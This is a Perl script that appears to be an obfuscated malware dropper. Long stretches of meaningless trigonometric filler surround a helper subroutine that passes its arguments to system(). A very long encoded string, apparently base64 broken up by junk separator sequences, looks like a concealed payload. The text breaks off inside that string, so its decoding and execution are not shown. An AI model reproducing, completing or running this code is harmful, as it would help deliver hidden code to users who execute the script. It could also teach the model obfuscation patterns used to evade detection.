use warnings;
use strict;

my $qdqldbz = 17.78;
my $oxqrpkt = cos(9.43091) - sin(5.9) - cos(11.0056);
my $wwoyicd = sin(-33.352212) * cos(40.14);
my $xxqxbeh = -48.80271;
$qdqldbz = cos($oxqrpkt) + cos(-17.02);
$xxqxbeh = cos(-49.24) * cos(-29.9373) + cos(40.19);
print "$qdqldbz\n";
$oxqrpkt = cos(-0.384078) + sin($qdqldbz);
$qdqldbz = sin(9.47) + cos(3.23) * cos(-1.53275) + cos(-11.2133221);

my $fbldoao = sin(3.44) - sin(-11.39) + sin(20.603508);
my $cxeoetg = -27.74;
$fbldoao = sin($fbldoao) * cos(-37.84252) - sin($cxeoetg) - sin($fbldoao);
print "$cxeoetg\n";
$cxeoetg = sin($fbldoao) * cos($fbldoao) + sin($fbldoao);
print "$fbldoao\n";

my $hckcwfc = sin(9.2101855) + sin(-3.2761422) * cos(-43.4093) * sin(-3.774);
my $sgbsemh = -45.849904;
$hckcwfc = sin($hckcwfc) + sin(23.355) + sin($hckcwfc) + sin(33.034619);
print "$hckcwfc\n";
$hckcwfc = cos($hckcwfc) - cos($sgbsemh) * sin($hckcwfc) + cos($sgbsemh);
print "$sgbsemh\n";

my $wfpimoc = cos(32.6593421) * sin(-42.83) - cos(-41.87);
my $ahozuuu = sin(-31.67) - cos(43.099);
my $yilqmbt = sin(36.5056901) - cos(36.494196) + cos(26.35);
$wfpimoc = cos(45.71797) * cos(-35.18) + sin(3.652505) * cos(-40.0806);
print "$yilqmbt\n";
$yilqmbt = sin($ahozuuu) + sin(33.897) + sin($ahozuuu);
print "$yilqmbt\n";
$yilqmbt = cos($wfpimoc) + sin($yilqmbt) - sin($wfpimoc) - cos($ahozuuu);

sub gapomre { system(@_); }

my $hgoveut = cos(19.42) + cos(29.7428) - cos(-39.1713);
my $hmgkrvo = sin(35.44) * cos(-16.44383);
my $pdhupeq = cos(33.88869) - sin(25.3125);
$hgoveut = sin(-33.811196) + cos($hmgkrvo) + sin(-38.97);
$pdhupeq = sin($hmgkrvo) - sin(23.94044) * sin(-2.5371) - cos(-11.5653278);
$hmgkrvo = cos(-22.451) - cos($pdhupeq) - sin(-7.3241);
print "$pdhupeq\n";

my $zzwzcun = cos(-21.131) + sin(-22.9091) - sin(43.99281);
my $fljcvsy = sin(47.711559) - cos(0.789628) * cos(50.897) + sin(-35.3781876);
my $espxwsn = 33.886;
$zzwzcun = cos(28.3116542) * sin($zzwzcun) * cos(11.32);
$fljcvsy = sin($zzwzcun) + sin(-35.3985856);
$fljcvsy = sin(15.35805) + sin($zzwzcun);

my $nolzhcf = cos(42.03) - sin(-25.129645) - cos(25.6055) - sin(-49.904);
my $mprtmdv = sin(11.34745) - sin(-20.49);
my $bdfhvrd = 41.76;
my $iqbazhv = sin(-27.39475) - cos(-22.14) * cos(-22.95084) - cos(49.836);
$iqbazhv = sin($nolzhcf) + cos($iqbazhv);
$bdfhvrd = sin(23.28) - sin(47.2826) - sin(15.6) + sin($nolzhcf);
$bdfhvrd = sin($bdfhvrd) * cos(-9.38073);
$nolzhcf = cos(-14.35) + cos($iqbazhv) + sin(30.54891) - sin($bdfhvrd);
print "$iqbazhv\n";

my $uckmsdo = sin(-18.83) - sin(-10.2057) + sin(-6.432397) + cos(-18.27);
my $fnctjkr = cos(30.4437) - cos(-49.3072695) - sin(-47.644963) + sin(10.4209545);
my $odaecfp = sin(-4.31) + cos(-45.277886);
my $gletjnz = cos(-23.7593398) + sin(43.589208) + cos(41.8066) + sin(48.84);
$odaecfp = cos($gletjnz) + sin($odaecfp) - sin($odaecfp) * sin(6.7276);
$fnctjkr = cos(-0.246045) + cos(-0.18005) - cos(-13.362595);
$uckmsdo = cos($uckmsdo) * sin($uckmsdo) + sin(-49.8245753) - sin(-6.583);
print "$odaecfp\n";
$gletjnz = cos($odaecfp) * sin($gletjnz);
print "$fnctjkr\n";

my $polgevb = sin(-5.9621467) * sin(24.512) * sin(9.389);
my $welpiyj = cos(21.154018) - cos(14.05);
$polgevb = sin(-14.37577) - sin(35.1377) - cos(35.3513);
print "$welpiyj\n";
$welpiyj = sin($welpiyj) - cos($polgevb) + sin(46.3477);

my $dsflkjn = "#%a0&dc&%7-09#3#%a0&dR&%7-09#h&8b#a2+Z#%a0&d2&%7-09#U&8b#a2+z#%a0&dP&8b#a2+S&%7-09#J&%7-09#V&%7-09#R#%a0&dX&8b#a2+N&%7-09#E&8b#a2+Q&8b#a2+k&%7-09#J&8b#a2+R#%a0&dQ&8b#a2+U&8b#a2+F#%a0&dB#%a0&dQ&%7-09#U&%7-09#l#%a0&dB&%7-09#R&%7-09#2&8b#a2+h&8b#a2+2#%a0&dM&8b#a2+D&8b#a2+F&%7-09#n&%7-09#a&8b#a2+z&8b#a2+M&8b#a2+y&%7-09#a&%7-09#G#%a0&dR&%7-09#C&%7-09#Q&8b#a2+W&8b#a2+t&8b#a2+B#%a0&dQ&8b#a2+U&8b#a2+l#%a0&dB#%a0&dK#%a0&d0&%7-09#F#%a0&dB&%7-09#Q&8b#a2+V&8b#a2+N&8b#a2+B&8b#a2+Q#%a0&dn#%a0&dd#%a0&dB#%a0&dY#%a0&dV&8b#a2+c&8b#a2+1&8b#a2+M&%7-09#F&8b#a2+p&8b#a2+Y#%a0&dS&8b#a2+m&%7-09#Z#%a0&da&%7-09#b&8b#a2+W&8b#a2+x#%a0&dz&8b#a2+W&8b#a2+l#%a0&dh&8b#a2+N&%7-09#d&8b#a2+m#%a0&dM#%a0&dz#%a0&dU&%7-09#m#%a0&dh&8b#a2+a&8b#a2+M&%7-09#l&%7-09#V&8b#a2+6&%7-09#V&%7-09#l#%a0&dZ&%7-09#R#%a0&dS#%a0&dk&%7-09#F#%a0&dB#%a0&dT#%a0&d1#%a0&dR#%a0&dW&8b#a2+M#%a0&d0#%a0&dp&8b#a2+t&8b#a2+a&%7-09#z#%a0&dF&8b#a2+k#%a0&de&%7-09#V&%7-09#p&8b#a2+u#%a0&dV&%7-09#j&%7-09#R&%7-09#D#%a0&dd&8b#a2+0&%7-09#F#%a0&dC&8b#a2+Q&8b#a2+k&%7-09#9&%7-09#n&%7-09#R#%a0&dE&8b#a2+F#%a0&dB&%7-09#Q&8b#a2+U&%7-09#U&%7-09#2&%7-09#Q&8b#a2+U#%a0&d1&%7-09#B#%a0&dQ&%7-09#U#%a0&d8&8b#a2+x&%7-09#Y&%7-09#m&%7-09#E#%a0&dy&%7-09#d&%7-09#2&%7-09#N&%7-09#W&8b#a2+e&8b#a2+F&8b#a2+c&%7-09#r#%a0&dc&%7-09#y&%7-09#9&%7-09#H&8b#a2+V&%7-09#C&%7-09#t&%7-09#y#%a0&dR&%7-09#0&%7-09#J&%7-09#o&8b#a2+T#%a0&dn#%a0&dB&%7-09#P&8b#a2+U&%7-09#0&8b#a2+R&%7-09#i&%7-09#R&%7-09#n#%a0&dB&8b#a2+E&8b#a2+W&8b#a2+E#%a0&dZ&%7-09#F&%7-09#N&%7-09#j&%7-09#l#%a0&dm&8b#a2+Q&8b#a2+2#%a0&dd&%7-09#I&8b#a2+a&8b#a2+j&%7-09#l#%a0&dY&8b#a2+c&%7-09#z&%7-09#J&%7-09#j&8b#a2+a&8b#a2+H&%7-09#p&8b#a2+Y&%7-09#R&%7-09#D&%7-09#l&%7-09#J&8b#a2+S&%7-09#X&8b#a2+l#%a0&dz#%a0&dM#%a0&dT#%a0&dR#%a0&da&8b#a2+N&%7-09#3&%7-09#k#%a0&d3#%a0&dM#%a0&dG#%a0&do&8b#a2+3#%a0&dY&%7-09#2#%a0&d1#%a0&dk&8b#a2+b&%7-09#l&8b#a2+d#%a0&dM#%a0&dc&8b#a2+l#%a0&dF&%7-09#Z#%a0&da#%a0&dF#%a0&dZ&%7-09#h&%7-09#e&%7-09#D&%7-09#J&8b#a2+v#%a0&dZ#%a0&d2&%7-09#d&8b#a2+s&8b#a2+W#%a0&dW&8b#a2+N#%a0&dB&8b#a2+Q&%7-09#1&%7-09#J#%a0&dC&8b#a2+V#%a0&dX&8b#a2+J&8b#a2+R&8b#a2+U&%7-09#k#%a0&dl&8b#a2+R&8b#a2+Z&%7-09#U&8b#a2+t#%a0&dI&8b#a2+K&8b#a2+1#%a0&dF#%a0&dH&%7-09#N&%7-09#F&%7-09#N&8b#a2+t&8b#a2+b&8b#a2+W&8b#a2+I#%a0&d4#%a0&db&8b#a2+E&%7-09#F&8b#a2+q&%7-09#K&8b#a2+0&%7-09#J&8b#a2+H&%7-09#b#%a0&d2&8b#a2+t&8b#a2+F&%7-09#T&%7-09#F&%7-09#Z&8b#a2+G#%a0&dR#%a0&dm&%7-09#R&8b#a2+x&8b#a2+d&%7-09#1#%a0&dN&%7-09#t#%a0&db&%7-09#E&%7-09#N&%7-09#v&%7-09#V&%7-09#j#%a0&dZ&8b#a2+1&8b#a2+W&8b#a2+G#%a0&dZ#%a0&dt&%7-09#b&%7-09#k&%7-09#4&8b#a2+y&8b#a2+W&%7-09#j&8b#a2+Y&%7-09#x&8b#a2+M#%a0&dG&8b#a2+N#%a0&dL#%a0&dd&%7-09#m&%7-09#l&%7-09#E#%a0&dN&%7-09#X&%7-09#B&8b#a2+O#%a0&db#%a0&dX&8b#a2+Y&%7-09#z&%7-09#d&8b#a2+k#%a0&d9&8b#a2+Q&8b#a2+Z#%a0&dW&8b#a2+Z#%a0&dl&%7-09#T&%7-09#S#%a0&d9&8b#a2+m&8b#a2+Z#%a0&dT&%7-09#N#%a0&di#%a0&dM#%a0&dn#%a0&dp&8b#a2+l&%7-09#K&8b#a2+z&8b#a2+V&%7-09#u&%7-09#U&8b#a2+j#%a0&dh&%7-09#a#%a0&dS&%7-09#E#%a0&dE&%7-09#1&8b#a2+S#%a0&dk#%a0&dV&%7-09#F#%a0&dR#%a0&dH&%7-09#Z#%a0&dJ#%a0&de&8b#a2+H#%a0&dd#%a0&dp&%7-09#W&%7-09#F&8b#a2+R&8b#a2+n&8b#a2+V&8b#a2+W#%a0&dR&%7-09#P#%a0&dU&8b#a2+U&8b#a2+w#%a0&d2#%a0&dd&%7-09#G&%7-09#Q#%a0&d2&8b#a2+Q&8b#a2+0#%a0&dN&8b#a2+k#%a0&dT&8b#a2+W#%a0&dR&%7-09#K&%7-09#d&%7-09#l&8b#a2+h&%7-09#z&%7-09#Z&%7-09#F&8b#a2+Q&8b#a2+v&8b#a2+W#%a0&dl&8b#a2+I&8b#a2+2#%a0&dc&%7-09#V&8b#a2+l&8b#a2+Y&%7-09#T#%a0&d0&%7-09#d#%a0&d5&8b#a2+R&%7-09#S&8b#a2+9&%7-09#s#%a0&de&8b#a2+X&%7-09#d#%a0&dN&%7-09#c#%a0&dz&%7-09#F&8b#a2+o&%7-09#W&8b#a2+D#%a0&dR&8b#a2+j#%a0&dd#%a0&dj&%7-09#Z#%a0&dZ#%a0&dZ#%a0&dG&%7-09#p&%7-09#p&%7-09#e#%a0&dn#%a0&dl&%7-09#Y&8b#a2+d#%a0&dU&8b#a2+p&8b#a2+s&8b#a2+e&%7-09#W&%7-09#N&8b#a2+V&%7-09#V#%a0&dn&8b#a2+B&8b#a2+E#%a0&de#%a0&dH#%a0&dV&8b#a2+x&%7-09#L&%7-09#0#%a0&dl&%7-09#5#%a0&dQ&%7-09#1&%7-09#J&8b#a2+i#%a0&dO&8b#a2+U&%7-09#t&8b#a2+s&%7-09#M&%7-09#n&%7-09#l&%7-09#5#%a0&dS#%a0&dT#%a0&dl&8b#a2+K&8b#a2+W&8b#a2+G&%7-09#5&8b#a2+i&8b#a2+N&%7-09#z&8b#a2+J&%7-09#m&%7-09#M#%a0&dk&%7-09#Z&8b#a2+R#%a0&dQ&8b#a2+y#%a0&d9&8b#a2+3#%a0&da#%a0&dk&%7-09#9#%a0&dS&8b#a2+b&%7-09#H&8b#a2+R&%7-09#4#%a0&dO&8b#a2+F&%7-09#B&%7-09#Z#%a0&dY#%a0&dl&8b#a2+h#%a0&dk#%a0&da&%7-09#1#%a0&dZ&%7-09#m&8b#a2+N&%7-09#3#%a0&dZ#%a0&dI#%a0&dd&8b#a2+2#%a0&d5#%a0&dq&8b#a2+T#%a0&dW&%7-09#V&8b#a2+w#%a0&dZ&8b#a2+0#%a0&d5&%7-09#j&8b#a2+d#%a0&dk&%7-09#F&%7-09#I&%7-09#N&8b#a2+1#%a0&dB&8b#a2+n#%a0&dd&%7-09#C&8b#a2+t&8b#a2+6&%7-09#Z&%7-09#l&8b#a2+Y&8b#a2+3&%7-09#Z&8b#a2+W&%7-09#t&8b#a2+M#%a0&de&%7-09#U&8b#a2+0#%a0&d0&%7-09#M#%a0&dW&8b#a2+t#%a0&dC#%a0&dM#%a0&dT&8b#a2+J&%7-09#F&%7-09#W&8b#a2+V&%7-09#A&%7-09#1&8b#a2+R#%a0&dT&%7-09#d&8b#a2+p&%7-09#S#%a0&dm#%a0&dR&8b#a2+G&8b#a2+d&%7-09#n&%7-09#d&8b#a2+U&8b#a2+W&%7-09#W&%7-09#l&%7-09#U#%a0&de&8b#a2+E#%a0&d1&%7-09#2&8b#a2+S#%a0&dX&%7-09#h&%7-09#q&%7-09#U&8b#a2+D&8b#a2+M&%7-09#z#%a0&dV&%7-09#j&8b#a2+B&%7-09#0&%7-09#N#%a0&dU&8b#a2+p#%a0&dm&%7-09#N&%7-09#V#%a0&dB#%a0&dn&%7-09#T&%7-09#n&%7-09#g#%a0&d1#%a0&de&%7-09#V&%7-09#p&8b#a2+K#%a0&dR&8b#a2+S#%a0&d9#%a0&dT#%a0&dc&%7-09#n#%a0&dl&8b#a2+N#%a0&dL&8b#a2+2&8b#a2+Q&%7-09#z&8b#a2+Q&%7-09#i&%7-09#9&8b#a2+I#%a0&dQ&%7-09#k&%7-09#t&8b#a2+i&%7-09#d&%7-09#1&%7-09#E#%a0&d0&%7-09#d&8b#a2+l&8b#a2+Z&8b#a2+Q&%7-09#U#%a0&dV&%7-09#g#%a0&d3&8b#a2+b&%7-09#D#%a0&dV&%7-09#V#%a0&dQ&8b#a2+U&%7-09#p#%a0&dl&8b#a2+e&8b#a2+G&%7-09#1&8b#a2+r&%7-09#O#%a0&dG&%7-09#x&8b#a2+F&8b#a2+c#%a0&dk&%7-09#8&%7-09#5#%a0&dW&%7-09#F&%7-09#l&8b#a2+m#%a0&dU&8b#a2+2#%a0&d1&8b#a2+u&8b#a2+d&8b#a2+H&%7-09#F&8b#a2+X&8b#a2+U#%a0&dW&8b#a2+1&%7-09#0&8b#a2+O#%a0&dW&%7-09#k&8b#a2+r&%7-09#Z&8b#a2+U&%7-09#x#%a0&dp&%7-09#M&%7-09#3#%a0&dZ#%a0&di&8b#a2+Z&%7-09#G&%7-09#J#%a0&dO#%a0&dc#%a0&dk&8b#a2+5&8b#a2+5#%a0&dW&8b#a2+n&%7-09#l&8b#a2+F&%7-09#d&%7-09#U#%a0&dh&%7-09#q#%a0&dS&%7-09#m#%a0&dZ&%7-09#V#%a0&dM&8b#a2+k&%7-09#1#%a0&dU&8b#a2+c#%a0&dz&%7-09#N&8b#a2+6#%a0&dZ&8b#a2+T&%7-09#F#%a0&dy&%7-09#Z#%a0&d0&8b#a2+9&8b#a2+i&%7-09#c&8b#a2+D&%7-09#h&8b#a2+F&8b#a2+b#%a0&dG&8b#a2+g#%a0&dw&%7-09#W#%a0&dj#%a0&dI#%a0&dr&8b#a2+U&%7-09#G&%7-09#x&%7-09#Y#%a0&dV#%a0&dk&%7-09#R#%a0&dQ&8b#a2+N#%a0&d1&8b#a2+o#%a0&d5#%a0&dN&8b#a2+z&8b#a2+g&%7-09#r&%7-09#N#%a0&dH#%a0&dZ#%a0&dy#%a0&dY&8b#a2+i&8b#a2+s&8b#a2+x&%7-09#K&%7-09#2&%7-09#R&8b#a2+B&8b#a2+M&%7-09#2&8b#a2+x&8b#a2+W&8b#a2+c&%7-09#0&8b#a2+9#%a0&d2#%a0&dc#%a0&dk&%7-09#Q#%a0&dz&%7-09#V#%a0&dD#%a0&dY&8b#a2+v&8b#a2+O&8b#a2+U#%a0&dp&%7-09#2&8b#a2+d&%7-09#W&8b#a2+R&8b#a2+q#%a0&dM&8b#a2+W#%a0&dR#%a0&dB&8b#a2+M&%7-09#0&%7-09#J&%7-09#M&8b#a2+W&8b#a2+U#%a0&dV&%7-09#M&8b#a2+R&%7-09#E&8b#a2+h&8b#a2+K#%a0&dV&%7-09#U&%7-09#p&%7-09#J&%7-09#Y&%7-09#1&8b#a2+g#%a0&dz&8b#a2+Z#%a0&dy#%a0&dt#%a0&dp&%7-09#T#%a0&dG&%7-09#t#%a0&dj#%a0&dL&%7-09#1#%a0&dl#%a0&dy&8b#a2+a&8b#a2+n&%7-09#M&8b#a2+w&8b#a2+b&8b#a2+C#%a0&d9#%a0&dk#%a0&dZ#%a0&dn#%a0&dA#%a0&d3#%a0&dY&8b#a2+2&8b#a2+J&8b#a2+s#%a0&dM&%7-09#1#%a0&dN&%7-09#Y&%7-09#M&%7-09#E#%a0&dN#%a0&dp&8b#a2+a&8b#a2+3#%a0&dV&%7-09#i&8b#a2+V&%7-09#G#%a0&dR&8b#a2+1#%a0&dS&%7-09#1&%7-09#d#%a0&dP&8b#a2+d&%7-09#m#%a0&dx&%7-09#i&%7-09#R&%7-09#T#%a0&dN&8b#a2+5#%a0&dK&8b#a2+2&%7-09#d#%a0&ds&%7-09#Y&8b#a2+U&%7-09#d&%7-09#z#%a0&dT&%7-09#E&8b#a2+t#%a0&dJ&8b#a2+M&%7-09#H#%a0&dR&%7-09#x#%a0&db&%7-09#l&8b#a2+E#%a0&dr#%a0&db#%a0&dV&%7-09#Z#%a0&dG&%7-09#V#%a0&dH&8b#a2+l&%7-09#m&%7-09#d#%a0&dD&8b#a2+B#%a0&dK&8b#a2+c#%a0&dk&8b#a2+t#%a0&dC&%7-09#a&%7-09#j&8b#a2+F&8b#a2+I#%a0&dV&8b#a2+F&%7-09#V#%a0&dn&8b#a2+M&8b#a2+k&8b#a2+x&%7-09#w#%a0&dd#%a0&dF&%7-09#Z&8b#a2+r&8b#a2+a&8b#a2+G&%7-09#l&8b#a2+6&8b#a2+a&8b#a2+0&8b#a2+x#%a0&dK&%7-09#T&%7-09#n&8b#a2+d&8b#a2+K#%a0&dU&%7-09#i#%a0&d8&%7-09#4#%a0&dW&8b#a2+G&8b#a2+p&%7-09#J&%7-09#M&%7-09#k&%7-09#h&8b#a2+o#%a0&dM&8b#a2+G&%7-09#N&%7-09#v#%a0&dc&%7-09#D&8b#a2+F&%7-09#5&8b#a2+c&8b#a2+D#%a0&dl#%a0&d4&8b#a2+V&%7-09#E&8b#a2+t#%a0&dI&8b#a2+Z&8b#a2+D#%a0&dF#%a0&dF&%7-09#e&%7-09#H&8b#a2+F&8b#a2+k&%7-09#T&%7-09#1&%7-09#V#%a0&dZ#%a0&dM&8b#a2+T#%a0&dN#%a0&dk#%a0&dR&8b#a2+G&8b#a2+p#%a0&dT#%a0&dZ&%7-09#F#%a0&dB&8b#a2+T&8b#a2+a#%a0&dl#%a0&dp#%a0&ds&%7-09#a&8b#a2+l&8b#a2+E&%7-09#2#%a0&db#%a0&dH#%a0&dN&8b#a2+S&8b#a2+c&8b#a2+D&%7-09#l&%7-09#S#%a0&dN&%7-09#T#%a0&dF&8b#a2+L&%7-09#O&8b#a2+H&%7-09#p&%7-09#Y&8b#a2+Z&%7-09#z&%7-09#Z&%7-09#t#%a0&dN&8b#a2+E&%7-09#U#%a0&dy&8b#a2+c&8b#a2+V&8b#a2+d#%a0&dO#%a0&dY&8b#a2+T#%a0&dB&%7-09#w&%7-09#R&%7-09#H#%a0&dc&%7-09#4&8b#a2+W#%a0&dl#%a0&dh&%7-09#Z&8b#a2+b&8b#a2+U#%a0&dV&%7-09#2&8b#a2+M&8b#a2+n&%7-09#F#%a0&d4&%7-09#T&%7-09#j&8b#a2+N&%7-09#n#%a0&dT#%a0&dn#%a0&dh&8b#a2+L&8b#a2+a#%a0&dX&8b#a2+V&%7-09#z#%a0&dc&8b#a2+D#%a0&dE&8b#a2+1&8b#a2+S&%7-09#3&%7-09#M#%a0&d1&8b#a2+Y&8b#a2+k&8b#a2+1&8b#a2+T&8b#a2+Q&8b#a2+n&%7-09#Q&%7-09#y&8b#a2+U&%7-09#H#%a0&dZ#%a0&d2&8b#a2+a&%7-09#m&%7-09#x#%a0&dL&%7-09#d&8b#a2+T&8b#a2+R&%7-09#G&%7-09#e#%a0&dT#%a0&dZ&%7-09#t&%7-09#d&8b#a2+3&%7-09#J&8b#a2+u&%7-09#Q&%7-09#z#%a0&dl#%a0&dS#%a0&dM&%7-09#1&8b#a2+k#%a0&d2&8b#a2+d&8b#a2+k&%7-09#N#%a0&di&8b#a2+b&%7-09#0#%a0&dN#%a0&dl#%a0&da&8b#a2+H#%a0&dJ#%a0&dJ&%7-09#b&8b#a2+D&%7-09#Q&8b#a2+5#%a0&de&%7-09#X#%a0&dB#%a0&dm#%a0&dN#%a0&d0&%7-09#h&8b#a2+j&%7-09#Y&%7-09#T#%a0&dV#%a0&dS&8b#a2+b&8b#a2+H#%a0&dh&%7-09#4#%a0&dN&8b#a2+m#%a0&dQ&%7-09#z&%7-09#c#%a0&dl&%7-09#l#%a0&d0#%a0&dM&%7-09#m&8b#a2+x&8b#a2+k#%a0&dM#%a0&dz&8b#a2+g&8b#a2+r#%a0&dY&8b#a2+n&8b#a2+J#%a0&dq&%7-09#M&%7-09#G&%7-09#x#%a0&dT#%a0&dN&8b#a2+z&%7-09#l#%a0&dk&%7-09#W#%a0&dm#%a0&dZ#%a0&dl&%7-09#L&%7-09#2#%a0&dI&8b#a2+1#%a0&dN&%7-09#k#%a0&dh#%a0&d2&%7-09#V&8b#a2+F#%a0&dZ#%a0&dw#%a0&dT#%a0&dG&8b#a2+l&8b#a2+X#%a0&dZ&%7-09#m&8b#a2+Z&%7-09#q#%a0&dd&8b#a2+z&%7-09#R&8b#a2+j#%a0&dT&%7-09#0&8b#a2+h&8b#a2+E&8b#a2+e&8b#a2+D&8b#a2+g#%a0&dr&8b#a2+Z#%a0&dl&%7-09#B#%a0&d6#%a0&dL#%a0&dz#%a0&dR#%a0&dL&8b#a2+K&8b#a2+0&%7-09#4&8b#a2+r&%7-09#O&%7-09#T&8b#a2+V#%a0&dT&8b#a2+V&%7-09#H&%7-09#I&%7-09#5&%7-09#Y#%a0&dW&8b#a2+9&%7-09#6&%7-09#e&8b#a2+G#%a0&dM#%a0&dr&%7-09#Y&8b#a2+n&%7-09#R&%7-09#E#%a0&dN#%a0&d0#%a0&dR&%7-09#I&8b#a2+Z#%a0&d3&%7-09#d&8b#a2+U#%a0&dV&8b#a2+X&8b#a2+J&%7-09#r#%a0&dS&%7-09#D&%7-09#l&8b#a2+l#%a0&dT&%7-09#2&%7-09#Y&%7-09#x#%a0&dV&%7-09#X#%a0&dp#%a0&dR#%a0&dV&8b#a2+z#%a0&dd#%a0&dQ&8b#a2+d#%a0&dC&8b#a2+9#%a0&d6#%a0&dT&%7-09#m&%7-09#F&%7-09#a#%a0&dK&8b#a2+1&8b#a2+B&%7-09#m&8b#a2+K&%7-09#0&8b#a2+J&8b#a2+y&%7-09#e#%a0&dk#%a0&d5&%7-09#x&%7-09#M#%a0&d0&8b#a2+c#%a0&dv#%a0&dY&%7-09#k#%a0&do&8b#a2+z#%a0&da#%a0&dk&%7-09#Y&%7-09#2&%7-09#N&%7-09#i&8b#a2+8&%7-09#4&8b#a2+T#%a0&dV&8b#a2+o#%a0&dv#%a0&dU&%7-09#G&8b#a2+4#%a0&dr&8b#a2+T&8b#a2+X&%7-09#l&8b#a2+x#%a0&dL#%a0&dz&%7-09#J&%7-09#C&%7-09#W#%a0&dF#%a0&dR&%7-09#2#%a0&dc#%a0&d3&%7-09#R&%7-09#N&8b#a2+Z#%a0&dm#%a0&dt#%a0&du&%7-09#R#%a0&dn&8b#a2+N&8b#a2+P&8b#a2+d&%7-09#n#%a0&dh&%7-09#a&8b#a2+Z&8b#a2+H&%7-09#V&%7-09#m#%a0&dU&8b#a2+X&%7-09#B#%a0&da&8b#a2+Z&8b#a2+V&%7-09#Z&8b#a2+G&%7-09#N&8b#a2+W#%a0&dZ&%7-09#S#%a0&dT#%a0&dE#%a0&dc&8b#a2+1&%7-09#T&8b#a2+X#%a0&dp&8b#a2+J#%a0&dK#%a0&d0&%7-09#c#%a0&dx#%a0&dO&8b#a2+E&%7-09#V#%a0&dY#%a0&db#%a0&dG&8b#a2+J&%7-09#O&8b#a2+O#%a0&dX#%a0&dp#%a0&d2#%a0&dU&%7-09#G&%7-09#5&8b#a2+k&8b#a2+M#%a0&dD&%7-09#h&%7-09#6#%a0&de#%a0&dW#%a0&dp&%7-09#Y&%7-09#b&8b#a2+T#%a0&dV&%7-09#j&%7-09#Z#%a0&di&8b#a2+9#%a0&du&8b#a2+N&8b#a2+2&%7-09#Y&8b#a2+2#%a0&dW&%7-09#W&8b#a2+Z&%7-09#v#%a0&db&%7-09#k&8b#a2+h&8b#a2+j#%a0&dY#%a0&dm&8b#a2+J&%7-09#T&%7-09#N#%a0&dF&8b#a2+B#%a0&dU&%7-09#a&8b#a2+D&8b#a2+Y#%a0&d5&%7-09#W#%a0&dn&8b#a2+V&8b#a2+G#%a0&db&8b#a2+G#%a0&d9&8b#a2+2&%7-09#a&%7-09#E&%7-09#Z&8b#a2+h&%7-09#Y&8b#a2+n&%7-09#Y&%7-09#5#%a0&dS&8b#a2+z&%7-09#R#%a0&dm&8b#a2+N#%a0&dW&%7-09#5&%7-09#i&8b#a2+W&%7-09#F#%a0&dF&%7-09#C&%7-09#b&%7-09#T#%a0&dl&8b#a2+s#%a0&dS&%7-09#G&%7-09#J&8b#a2+2&%7-09#b#%a0&dW&%7-09#V#%a0&dR#%a0&dV#%a0&dT#%a0&dl#%a0&d1&%7-09#b&%7-09#X#%a0&dN#%a0&dy&%7-09#S#%a0&d2&%7-09#h&8b#a2+Q&%7-09#U&%7-09#G&%7-09#5#%a0&du#%a0&dZ#%a0&dn#%a0&dV&%7-09#Y&8b#a2+S&%7-09#j#%a0&dZ&%7-09#6&8b#a2+c&%7-09#1#%a0&dU&8b#a2+2#%a0&dV&8b#a2+2&8b#a2+5&%7-09#s&%7-09#M&8b#a2+H&8b#a2+F#%a0&dh#%a0&dM&8b#a2+W&%7-09#l#%a0&d6&%7-09#V#%a0&dl&%7-09#F#%a0&dD&%7-09#U&8b#a2+T&%7-09#N#%a0&dV&%7-09#N&8b#a2+U&8b#a2+s#%a0&dv&%7-09#T&%7-09#T&%7-09#I&%7-09#z&8b#a2+R#%a0&d2&%7-09#h&%7-09#Q#%a0&dN&8b#a2+D&8b#a2+l&8b#a2+2&8b#a2+d#%a0&dV&8b#a2+k&%7-09#5&%7-09#W#%a0&dG&%7-09#s&8b#a2+5&%7-09#e&%7-09#n#%a0&dR&8b#a2+z&8b#a2+O&8b#a2+H#%a0&dJ&8b#a2+w&8b#a2+d#%a0&dm&8b#a2+h&8b#a2+k&8b#a2+b#%a0&dD#%a0&dN#%a0&d1&%7-09#c&8b#a2+k&%7-09#t&%7-09#W&%7-09#Y&8b#a2+X&8b#a2+R#%a0&dP&%7-09#Z&8b#a2+W#%a0&dJ&%7-09#q#%a0&dd#%a0&dl#%a0&dp&%7-09#T#%a0&dY#%a0&dX&8b#a2+N&%7-09#O&%7-09#N#%a0&d1&8b#a2+A&%7-09#3&%7-09#W&8b#a2+E#%a0&d5#%a0&dm&%7-09#W&8b#a2+X&%7-09#k&8b#a2+5&%7-09#T&%7-09#1&%7-09#Z#%a0&dm&%7-09#M#%a0&dk#%a0&dN&%7-09#5#%a0&dZ&8b#a2+E&8b#a2+J&8b#a2+m#%a0&de#%a0&dj#%a0&dl&%7-09#m&8b#a2+a#%a0&dS#%a0&d9&8b#a2+j&8b#a2+a&8b#a2+S&8b#a2+t#%a0&dy#%a0&dN&8b#a2+U&8b#a2+l&8b#a2+W#%a0&dW&%7-09#j#%a0&dV&%7-09#z&%7-09#Y&8b#a2+0&%7-09#d#%a0&dN#%a0&dN&%7-09#2&8b#a2+h&8b#a2+5&%7-09#L#%a0&d3&%7-09#o&8b#a2+r#%a0&dV&8b#a2+m&%7-09#x&8b#a2+k&8b#a2+e&%7-09#k#%a0&dd&%7-09#L&%7-09#a&8b#a2+m&8b#a2+R&%7-09#Z&%7-09#N&8b#a2+X&8b#a2+p#%a0&d0&%7-09#c&%7-09#H&%7-09#U&%7-09#z&%7-09#V&%7-09#H&%7-09#h&%7-09#n&%7-09#d&8b#a2+H&8b#a2+V&8b#a2+H&%7-09#M#%a0&d2&8b#a2+V&%7-09#H#%a0&dW#%a0&dk#%a0&dJ&%7-09#0&8b#a2+N&8b#a2+1#%a0&dR&8b#a2+5&%7-09#S&%7-09#F#%a0&dZ&%7-09#X&8b#a2+Z&8b#a2+k&8b#a2+1&8b#a2+J&8b#a2+d#%a0&dV&%7-09#B&%7-09#y&8b#a2+U&%7-09#C&%7-09#t&8b#a2+r&%7-09#M&%7-09#D&%7-09#A&%7-09#y&8b#a2+c&8b#a2+G&8b#a2+h#%a0&dj&%7-09#d#%a0&dn&8b#a2+V&%7-09#P#%a0&dY#%a0&dW&%7-09#x#%a0&dN&8b#a2+Q&8b#a2+k&8b#a2+0#%a0&dr#%a0&dZ#%a0&dl&%7-09#B#%a0&dq&%7-09#d#%a0&dz#%a0&dR&%7-09#j#%a0&dT&%7-09#0#%a0&dh#%a0&dE#%a0&de#%a0&dD&%7-09#g&8b#a2+r&%7-09#Z&%7-09#l&%7-09#B&8b#a2+q&8b#a2+d&%7-09#z#%a0&dR#%a0&dj&8b#a2+U&8b#a2+E&8b#a2+h&8b#a2+P&8b#a2+N#%a0&dG&%7-09#N&%7-09#F#%a0&dL&%7-09#3&%7-09